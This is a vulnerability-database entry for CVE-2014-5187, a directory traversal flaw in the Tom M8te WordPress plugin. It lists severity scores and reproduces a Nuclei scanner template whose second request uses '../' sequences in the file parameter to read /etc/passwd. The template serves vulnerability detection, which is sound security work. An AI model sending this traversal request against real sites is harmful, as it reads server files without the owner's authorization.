Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-5187
HistorySep 03, 2024 - 7:03 a.m.

Tom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal

2024-09-0307:03:53
ProjectDiscovery
github.com
3
tom m8te
plugin
directory traversal
cve-2014-5187
wordpress
remote attackers

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.15

Percentile

95.9%

Directory traversal vulnerability in the Tom M8te (tom-m8te) plugin 1.5.3 for WordPress allows remote attackers to read arbitrary files via the file parameter to tom-download-file.php.
id: CVE-2014-5187

info:
  name: Tom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal
  author: DhiyaneshDK
  severity: medium
  description: |
    Directory traversal vulnerability in the Tom M8te (tom-m8te) plugin 1.5.3 for WordPress allows remote attackers to read arbitrary files via the file parameter to tom-download-file.php.
  reference:
    - https://wpscan.com/vulnerability/3095c3f3-9cdc-49f8-8478-c2922f0a442a/
    - https://codevigilant.com/disclosure/wp-plugin-tom-m8te-local-file-inclusion/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-5187
    cwe-id: CWE-22
    epss-score: 0.00845
    epss-percentile: 0.82498
    cpe: cpe:2.3:a:tom_m8te_plugin_project:tom-m8te_plugin:1.5.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tom_m8te_plugin_project
    product: tom-m8te_plugin
    framework: wordpress
    publicwww-query: "/wp-content/plugins/tom-m8te/"
  tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,tom-m8te

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/tom-m8te/")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bb297bf252da16e9350223cd423c54420a8079d1ecc051afd2a0e7d04795ad2c022100a9b4094dfee78bd65b4959c08fd62e0c180d939183c80367280ce08372cd7d41:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.15

Percentile

95.9%